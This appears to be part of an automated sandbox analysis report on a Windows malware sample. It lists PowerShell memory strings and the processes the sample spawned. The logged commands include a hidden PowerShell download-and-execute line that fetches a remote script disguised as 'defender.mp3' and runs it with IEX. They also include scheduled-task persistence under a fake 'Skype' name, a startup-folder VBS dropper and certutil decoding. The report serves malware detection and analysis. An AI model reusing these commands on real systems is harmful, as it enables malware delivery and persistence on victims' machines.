Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ac:\windows\microsoft.net\framework64\v4.0.30319\\wminet_utils.dllx
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: +software\microsoft\.netframework\v4.0.30319
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: wmidisablecomsecurity
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: #select * from win32_operatingsystem
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: __genus
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: __path
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: __path
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: __relpath
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 9c:\windows\system32\windowspowershell\v1.0\powershell.exe
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: \root\securitycenter2
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: select * from antivirusproduct
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1.2.3
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: clrcompression.dll
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: deflateinit2_
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: deflateend
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: inflateinit2_
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: inflate
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: inflateend
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: zlibcompileflagsx
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: qkkbal
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: wn>jj
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: y5y5p
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: beginreceive
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 2exception checking module analysis cache {0}: {1}
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1exception writing module analysis cache {0}: {1}
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: moduleanalysiscache
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: :c:\users\user\appdata\local\microsoft\windows\powershell
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: psmodulecache
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 2\psreadline.psm1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: psconsolehostreadline
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-psreadlineoption
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: set-psreadlinekeyhandler
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-psreadlinekeyhandler
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: set-psreadlineoption
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: remove-psreadlinekeyhandler
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files (x86)\windowspowershell\modules\microsoft.powershell.operation.validation\1.0.1\microsoft.powershell.operation.validation.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-operationvalidation
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: invoke-operationvalidation
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files\windowspowershell\modules\powershellget\1.0.0.1\psmodule.psm1*
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: nc:\program files\windowspowershell\modules\powershellget\1.0.0.1\psmodule.psm1*
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: install-script
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: save-module
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: publish-module
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: find-module
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: download-package
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: update-module
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: find-command
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: unregister-psrepository
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-installedscript
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-dynamicoptions
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: add-packagesource
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: register-psrepository
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: find-dscresource
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: publish-script
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: find-rolecapability
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: uninstall-package
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-packagedependencies
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: find-script
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: initialize-provider
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-packageprovidername
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: test-scriptfileinfo
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-installedmodule
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: update-scriptfileinfo
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-installedpackage
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: resolve-packagesource
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: uninstall-module
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: remove-packagesource
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: update-script
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: uninstall-script
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: update-modulemanifest
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-feature
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: install-module
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: install-package
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: new-scriptfileinfo
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: set-psrepository
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-psrepository
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: save-script
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: find-package
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-random
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: out-string
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: write-progress
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: disable-psbreakpoint
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: update-formatdata
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: write-information
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: convertto-xml
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: set-variable
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: out-printer
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files (x86)\windowspowershell\modules\pester\3.4.0\pester.psm1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ic:\program files (x86)\windowspowershell\modules\pester\3.4.0\pester.psm1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: safegetcommand
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-scriptblockscope
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-dictionaryvaluefromfirstkeyfound
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: $get-dictionaryvaluefromfirstkeyfound
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: new-pesteroption
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: invoke-pester
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: resolvetestscripts
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: set-scriptblockscope
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files (x86)\windowspowershell\modules\packagemanagement\1.0.0.1\packagemanagement.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ac:\program files (x86)\windowspowershell\modules\packagemanagement\1.0.0.1\packagemanagement.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: set-packagesource
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: unregister-packagesource
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-packagesource
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: save-package
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-package
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: install-packageprovider
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: import-packageprovider
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-packageprovider
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: register-packagesource
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: find-packageprovider
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files\windowspowershell\modules\packagemanagement\1.0.0.1\packagemanagement.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: [c:\program files\windowspowershell\modules\packagemanagement\1.0.0.1\packagemanagement.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files\windowspowershell\modules\pester\3.4.0\pester.psm1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: cc:\program files\windowspowershell\modules\pester\3.4.0\pester.psm1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files (x86)\windowspowershell\modules\pester\3.4.0\pester.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ic:\program files (x86)\windowspowershell\modules\pester\3.4.0\pester.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: describe
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-testdriveitem
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: new-fixture
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: invoke-mock
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: inmodulescope
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: aftereach
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: aftereach
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: should
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: beforeeach
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-mockdynamicparameters
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: assert-verifiablemocks
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: beforeall
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: beforeall
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: set-testinconclusive
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: afterall
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: set-dynamicparametervariables
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: setup
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: assert-mockcalled
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files\windowspowershell\modules\psreadline\1.2\psreadline.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ic:\program files\windowspowershell\modules\psreadline\1.2\psreadline.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files\windowspowershell\modules\psreadline\1.
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ic:\program files\windowspowershell\modules\psreadline\1.
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files\windowspowershell\modules\powershellget\1.0.0.1\powershellget.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: sc:\program files\windowspowershell\modules\powershellget\1.0.0.1\powershellget.psd1(
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: am files\windowspowershell\modules\pester\3.4.0\pester.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: am files\windowspowershell\modules\pester\3.4.0\pester.psd1(
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files (x86)\windowspowershell\modules\powershellget\1.0.0.1\powershellget.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: yc:\program files (x86)\windowspowershell\modules\powershellget\1.0.0.1\powershellget.psd1(
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files\windowspowershell\modules\microsoft.powershell.operation.validation\1.0.1\microsoft.powershell.operation.validation.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files\windowspowershell\modules\microsoft.powershell.operation.validation\1.0.1\microsoft.powershell.operation.validation.psd1(
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\program files (x86)\windowspowershell\modules\powershellget\1.0.0.1\psmodule.psm1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: tc:\program files (x86)\windowspowershell\modules\powershellget\1.0.0.1\psmodule.psm1(
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: c:\windows\system32\windowspowershell\v1.0\modules\microsoft.powershell.utility\microsoft.powershell.utility.psd1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: qc:\windows\system32\windowspowershell\v1.0\modules\microsoft.powershell.utility\microsoft.powershell.utility.psd1(
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: remove-variable
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: convert-string
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: trace-command
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: sort-object
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: register-objectevent
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-runspace
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: format-table
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: wait-debugger
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-runspacedebug
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: export-pssession
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: write-error
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-date
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-uiculture
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: remove-psbreakpoint
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-pscallstack
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: export-clixml
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: update-typedata
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: remove-typedata
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: import-clixml
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-culture
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: format-wide
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: new-event
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: new-event
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: new-object
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: write-warning
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: write-verbose
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: set-alias
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: set-alias
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: unblock-file
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: convertfrom-json
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get-typedata
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: out-gridview

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140016D90 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,BlockInput,GetForegroundWindow,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,BlockInput,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400185A0 mouse_event,

Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd' '
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process created: C:\Users\user\AppData\Roaming\Ne - Copy.exe 'C:\Users\user\AppData\Roaming\Ne - Copy.exe'
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\winlogon.vbs'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe 'C:\Windows\system32\cacls.exe' 'C:\Windows\system32\config\system'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decode 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp' 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa

Source: powershell.exe, 0000000E.00000002.501640590.00000133857AC000.00000004.00000001.sdmp	Binary or memory string: Program Manager(
Source: xuXIetZvv6.exe, Ne - Copy.exe, powershell.exe, 0000000E.00000002.501640590.00000133857AC000.00000004.00000001.sdmp	Binary or memory string: Program Manager
